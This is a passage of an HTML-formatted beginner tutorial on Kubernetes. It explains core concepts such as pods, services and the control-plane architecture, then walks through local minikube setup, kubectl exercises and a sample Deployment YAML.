&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD pipelines&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Jenkins, GitHub Actions, ArgoCD, Tekton&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Container image security scanning&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Trivy, Snyk, Harbor&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Secret rotation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;HashiCorp Vault, Sealed Secrets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Observability by default&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;You add Prometheus, Grafana, Loki yourself&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Multi-region failover&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Cluster federation, multi-cluster tools&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;App building/packaging&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Helm, Kustomize, your own Dockerfile&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  A Note on History
&lt;/h3&gt;

&lt;p&gt;Kubernetes was created by Google (based on their internal system called Borg) and open-sourced in 2014. It's now maintained by the &lt;strong&gt;Cloud Native Computing Foundation (CNCF)&lt;/strong&gt; and is the de facto standard for container orchestration.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Version awareness:&lt;/strong&gt; Kubernetes releases 3 minor versions per year (e.g., v1.28, v1.29, v1.30). APIs and behaviors can change between versions. Always check the &lt;a href="https://kubernetes.io/releases/" rel="noopener noreferrer"&gt;Kubernetes changelog&lt;/a&gt; and verify compatibility with your cluster's version.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Part 2 — Core Concepts: The Kubernetes Vocabulary
&lt;/h2&gt;

&lt;p&gt;One reason Kubernetes feels intimidating is the terminology. Let's demystify the key terms with real-world analogies.&lt;/p&gt;

&lt;h3&gt;
  
  
  Kubernetes Is a Declarative, Desired-State System
&lt;/h3&gt;

&lt;p&gt;This is the most important idea in the whole series. In Kubernetes, you don't issue commands like "start this container now." Instead, you describe what you &lt;em&gt;want&lt;/em&gt; to exist, and Kubernetes continuously works to make reality match that description.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Declarative:&lt;/strong&gt; "I want 3 copies of my app running."&lt;br&gt;
&lt;strong&gt;Imperative:&lt;/strong&gt; "Start container 1. Start container 2. Start container 3."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Kubernetes is always declarative. Your YAML files express desired state. The system stores that desired state and reconciles it with reality forever.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Cluster
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;cluster&lt;/strong&gt; is the entire Kubernetes environment — the collection of machines that Kubernetes manages together as one system.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr7sj7ask04ujftujbedj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr7sj7ask04ujftujbedj.png" alt="image" width="800" height="154"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Nodes
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;node&lt;/strong&gt; is an individual machine (physical or virtual) in the cluster. There are two types:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Control Plane node&lt;/strong&gt; — the brain. It makes decisions about the cluster and stores desired state.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Worker nodes&lt;/strong&gt; — where your actual application containers run.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Analogy:&lt;/strong&gt; If the cluster is a restaurant, the control plane is the kitchen manager who tracks all the orders, and worker nodes are the individual chefs who actually cook.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Pods
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;Pod&lt;/strong&gt; is the smallest deployable unit in Kubernetes. A Pod wraps one or more containers that should always run together and share the same network and storage.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Analogy:&lt;/strong&gt; If a container is a single fish, a Pod is the fish tank. Usually one fish per tank, but sometimes a few that need to live together.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsducxhu2eopjddwu383.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsducxhu2eopjddwu383.png" alt="image" width="800" height="163"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key facts about Pods:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pods are &lt;strong&gt;ephemeral&lt;/strong&gt; — they can be killed and replaced at any time.&lt;/li&gt;
&lt;li&gt;Each Pod gets its own IP address inside the cluster's internal network. That IP is &lt;strong&gt;not routable outside the cluster&lt;/strong&gt; and &lt;strong&gt;changes every time the Pod is rescheduled&lt;/strong&gt;. Never hardcode a Pod IP.&lt;/li&gt;
&lt;li&gt;You rarely create Pods directly — you use higher-level abstractions like Deployments.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Deployments
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;Deployment&lt;/strong&gt; tells Kubernetes: &lt;em&gt;"I want X copies of this Pod running at all times, and here's how to roll out changes safely."&lt;/em&gt; It manages the full lifecycle of Pods — creating them, replacing crashed ones, and orchestrating updates.&lt;/p&gt;

&lt;h3&gt;
  
  
  Services
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;Service&lt;/strong&gt; gives Pods a stable network identity. Since Pods die and get new IPs constantly, a Service acts as a consistent entry point that routes traffic to healthy Pods matching a label selector.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Analogy:&lt;/strong&gt; A Service is like a restaurant's phone number. The chefs (Pods) might change, but you always call the same number.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Namespaces
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Namespaces&lt;/strong&gt; are virtual partitions within a cluster. They let you organize and isolate resources — commonly used to separate environments (dev/staging/prod), teams, or projects within the same physical cluster.&lt;/p&gt;

&lt;h3&gt;
  
  
  ConfigMaps and Secrets
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ConfigMap&lt;/strong&gt; — stores non-sensitive configuration data (e.g., environment variables, config files).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secret&lt;/strong&gt; — stores sensitive data (e.g., passwords, API keys). Stored base64-encoded in etcd; &lt;strong&gt;base64 is encoding, not encryption&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Volumes and PersistentVolumes
&lt;/h3&gt;

&lt;p&gt;Containers are stateless by default — their filesystem disappears when they stop. &lt;strong&gt;Volumes&lt;/strong&gt; attach storage to Pods. &lt;strong&gt;PersistentVolumes (PV)&lt;/strong&gt; are cluster-level storage resources that outlive individual Pods.&lt;/p&gt;

&lt;h3&gt;
  
  
  Quick Vocabulary Reference
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Term&lt;/th&gt;
&lt;th&gt;One-liner&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Cluster&lt;/td&gt;
&lt;td&gt;The whole Kubernetes environment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Node&lt;/td&gt;
&lt;td&gt;A machine in the cluster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pod&lt;/td&gt;
&lt;td&gt;One or more containers scheduled together&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment&lt;/td&gt;
&lt;td&gt;Manages desired state and updates of Pods&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Service&lt;/td&gt;
&lt;td&gt;Stable network endpoint that routes to Pods&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Namespace&lt;/td&gt;
&lt;td&gt;Virtual partition within a cluster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ConfigMap&lt;/td&gt;
&lt;td&gt;Non-sensitive config data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Secret&lt;/td&gt;
&lt;td&gt;Sensitive config data (base64-encoded at rest by default)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PersistentVolume&lt;/td&gt;
&lt;td&gt;Storage that survives Pod restarts&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Part 3 — The Architecture: How It All Fits Together
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Big Picture
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvpa4n85jizbw4i6htks1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvpa4n85jizbw4i6htks1.png" alt="image" width="800" height="438"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Control Plane Components
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;API Server (&lt;code&gt;kube-apiserver&lt;/code&gt;)&lt;/strong&gt;&lt;br&gt;
The front door to Kubernetes. Every command you run (via kubectl or any tool) goes through the API server over TLS. It validates requests, enforces authentication and authorization, and persists state to etcd.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;etcd&lt;/strong&gt;&lt;br&gt;
A distributed key-value store that holds the &lt;strong&gt;desired state&lt;/strong&gt; of the entire cluster — what resources exist, their configuration, and their status. If etcd is healthy &lt;em&gt;and&lt;/em&gt; you have functioning nodes and storage backends, Kubernetes can reconstruct all workloads from scratch because the desired state is fully preserved there. Note that etcd does not store your container images, PersistentVolume data, or node OS state — those live elsewhere.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scheduler (&lt;code&gt;kube-scheduler&lt;/code&gt;)&lt;/strong&gt;&lt;br&gt;
Watches for newly created Pods that have no node assigned, then selects the best node to run them based on resource requests, node capacity, affinity rules, and other constraints.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controller Manager (&lt;code&gt;kube-controller-manager&lt;/code&gt;)&lt;/strong&gt;&lt;br&gt;
Runs a collection of &lt;em&gt;controllers&lt;/em&gt; — background loops that watch the cluster state and take actions to move toward the desired state. The Deployment controller ensures the right number of Pod replicas are running. The Node controller notices when nodes go down. There are dozens of built-in controllers.&lt;/p&gt;
&lt;h3&gt;
  
  
  Worker Node Components
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;kubelet&lt;/strong&gt;&lt;br&gt;
An agent that runs on every worker node. It watches the API server for Pods assigned to its node and instructs the container runtime to start or stop containers accordingly. It also reports Pod health back to the control plane.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;kube-proxy&lt;/strong&gt;&lt;br&gt;
Maintains network forwarding rules (traditionally via iptables or IPVS) on each node to implement Service routing. In modern clusters using eBPF-based networking (like &lt;a href="https://cilium.io/" rel="noopener noreferrer"&gt;Cilium&lt;/a&gt;), kube-proxy may be replaced entirely.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Container Runtime&lt;/strong&gt;&lt;br&gt;
The software that actually runs containers. Kubernetes uses the &lt;strong&gt;Container Runtime Interface (CRI)&lt;/strong&gt; to support multiple runtimes. The most common today are &lt;strong&gt;containerd&lt;/strong&gt; and &lt;strong&gt;CRI-O&lt;/strong&gt;. Kubernetes previously communicated with Docker via a compatibility shim called dockershim, which was removed in Kubernetes v1.24.&lt;/p&gt;
&lt;h3&gt;
  
  
  The Reconciliation Loop (The Heart of Kubernetes)
&lt;/h3&gt;

&lt;p&gt;This is the single most important concept to internalize. Kubernetes is always running reconciliation loops — comparing desired state with actual state and taking corrective action.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fczsgbc3uizndsw4xirb8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fczsgbc3uizndsw4xirb8.png" alt="image" width="800" height="151"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This loop never stops. If a Pod crashes at 3am, the controller loop notices within seconds and creates a replacement — no human intervention required.&lt;/p&gt;



&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Part 4 — Hands-On: Your First Kubernetes App
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Setting Up a Local Cluster
&lt;/h3&gt;

&lt;p&gt;You need a local Kubernetes environment. Pick one:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Best for&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;minikube&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Beginners, most documentation&lt;/td&gt;
&lt;td&gt;&lt;a href="https://minikube.sigs.k8s.io/docs/start/" rel="noopener noreferrer"&gt;minikube.sigs.k8s.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;kind&lt;/strong&gt; (Kubernetes in Docker)&lt;/td&gt;
&lt;td&gt;Lightweight, CI-friendly&lt;/td&gt;
&lt;td&gt;&lt;a href="https://kind.sigs.k8s.io/" rel="noopener noreferrer"&gt;kind.sigs.k8s.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;k3d&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fastest startup, uses k3s&lt;/td&gt;
&lt;td&gt;&lt;a href="https://k3d.io/" rel="noopener noreferrer"&gt;k3d.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;Docker Desktop&lt;/strong&gt; (built-in K8s)&lt;/td&gt;
&lt;td&gt;If you already have Docker Desktop&lt;/td&gt;
&lt;td&gt;Enable in Settings → Kubernetes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rancher Desktop&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Open-source Docker Desktop alternative&lt;/td&gt;
&lt;td&gt;&lt;a href="https://rancherdesktop.io/" rel="noopener noreferrer"&gt;rancherdesktop.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;You'll also need &lt;code&gt;kubectl&lt;/code&gt; — the command-line tool to interact with Kubernetes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://kubernetes.io/docs/tasks/tools/" rel="noopener noreferrer"&gt;Install kubectl&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Exercise 1: Start Your Cluster
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# With minikube&lt;/span&gt;
minikube start

&lt;span class="c"&gt;# Verify your cluster is running&lt;/span&gt;
kubectl cluster-info

&lt;span class="c"&gt;# See your nodes&lt;/span&gt;
kubectl get nodes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Expected output (version number will vary):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;NAME       STATUS   ROLES           AGE   VERSION
minikube   Ready    control-plane   1m    v1.28.0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Exercise 2: Deploy Your First App
&lt;/h3&gt;

&lt;p&gt;Let's deploy a simple web server (nginx):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create a deployment&lt;/span&gt;
kubectl create deployment my-nginx &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;nginx

&lt;span class="c"&gt;# Check it's running&lt;/span&gt;
kubectl get deployments
kubectl get pods
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see a Pod with a status of &lt;code&gt;Running&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Exercise 3: Expose It as a Service
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Expose the deployment as a service&lt;/span&gt;
kubectl expose deployment my-nginx &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80 &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;NodePort

&lt;span class="c"&gt;# Get the URL (minikube only)&lt;/span&gt;
minikube service my-nginx &lt;span class="nt"&gt;--url&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Open the URL in your browser — you'll see the nginx welcome page. 🎉&lt;/p&gt;

&lt;h3&gt;
  
  
  Exercise 4: Explore with kubectl
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Describe a pod (get detailed info, including Events)&lt;/span&gt;
kubectl describe pod &amp;lt;pod-name&amp;gt;

&lt;span class="c"&gt;# View logs&lt;/span&gt;
kubectl logs &amp;lt;pod-name&amp;gt;

&lt;span class="c"&gt;# Get a shell inside a running container&lt;/span&gt;
kubectl &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; &amp;lt;pod-name&amp;gt; &lt;span class="nt"&gt;--&lt;/span&gt; /bin/bash

&lt;span class="c"&gt;# Delete everything you created&lt;/span&gt;
kubectl delete deployment my-nginx
kubectl delete service my-nginx
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding kubectl Syntax
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl [command] [resource-type] [resource-name] [flags]

kubectl    get       pods          my-nginx-xxx    -n default
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Common commands: &lt;code&gt;get&lt;/code&gt;, &lt;code&gt;describe&lt;/code&gt;, &lt;code&gt;create&lt;/code&gt;, &lt;code&gt;apply&lt;/code&gt;, &lt;code&gt;delete&lt;/code&gt;, &lt;code&gt;logs&lt;/code&gt;, &lt;code&gt;exec&lt;/code&gt;&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Part 5 — Deployments, Scaling, and Self-Healing
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Writing YAML (Declarative Configuration)
&lt;/h3&gt;

&lt;p&gt;So far we've used imperative commands (&lt;code&gt;kubectl create&lt;/code&gt;). The Kubernetes way is &lt;strong&gt;declarative&lt;/strong&gt; — you write a YAML file describing desired state, and Kubernetes makes it real and keeps it that way.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw5701yyt5b77dppawxtr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw5701yyt5b77dppawxtr.png" alt="image" width="800" height="88"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's a Deployment YAML with explanations:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# deployment.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;apps/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Deployment&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;replicas&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3&lt;/span&gt;                    &lt;span class="c1"&gt;# Desired number of Pod copies&lt;/span&gt;
  &lt;span class="na"&gt;selector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;                &lt;span class="c1"&gt;# Manages Pods with this label&lt;/span&gt;
  &lt;span class="na"&gt;strategy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;RollingUpdate&lt;/span&gt;
    &lt;span class="na"&gt;rollingUpdate&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;maxUnavailable&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;25%&lt;/span&gt;        &lt;span class="c1"&gt;# Max pods that can be down during update&lt;/span&gt;
      &lt;span class="na"&gt;maxSurge&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;25%&lt;/span&gt;              &lt;span class="c1"&gt;# Max extra pods allowed during update&lt;/span&gt;
  &lt;span class="na"&gt;template&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;                      &lt;span class="c1"&gt;# Pod template&lt;/span&gt;
    &lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
    &lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
        &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;nginx:1.25&lt;/span&gt;
        &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;containerPort&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
        &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;requests&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;              &lt;span class="c1"&gt;# Used by Scheduler to pick a node&lt;/span&gt;
            &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;64Mi"&lt;/span&gt;
            &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;250m"&lt;/span&gt;
          &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;                &lt;span class="c1"&gt;# Enforced at runtime by kubelet&lt;/span&gt;
            &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;128Mi"&lt;/span&gt;
            &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;500m"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Resource Requests vs Limits — An Important Distinction
&lt;/h3&gt;

&lt;p&gt;These two fields are frequently confused but serve very different purposes:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsvmb837kypdj68r1mm4u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsvmb837kypdj68r1mm4u.png" alt="image" width="800" height="510"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Always set resource requests.&lt;/strong&gt; Without them, the scheduler has no information to make good placement decisions, and a single misbehaving app can starve other Pods on the same node.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Exercise 5: Apply a Deployment
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Save the YAML above as deployment.yaml, then:&lt;/span&gt;
kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; deployment.yaml

&lt;span class="c"&gt;# Watch Pods come to life&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;--watch&lt;/span&gt;

&lt;span class="c"&gt;# See all 3 replicas&lt;/span&gt;
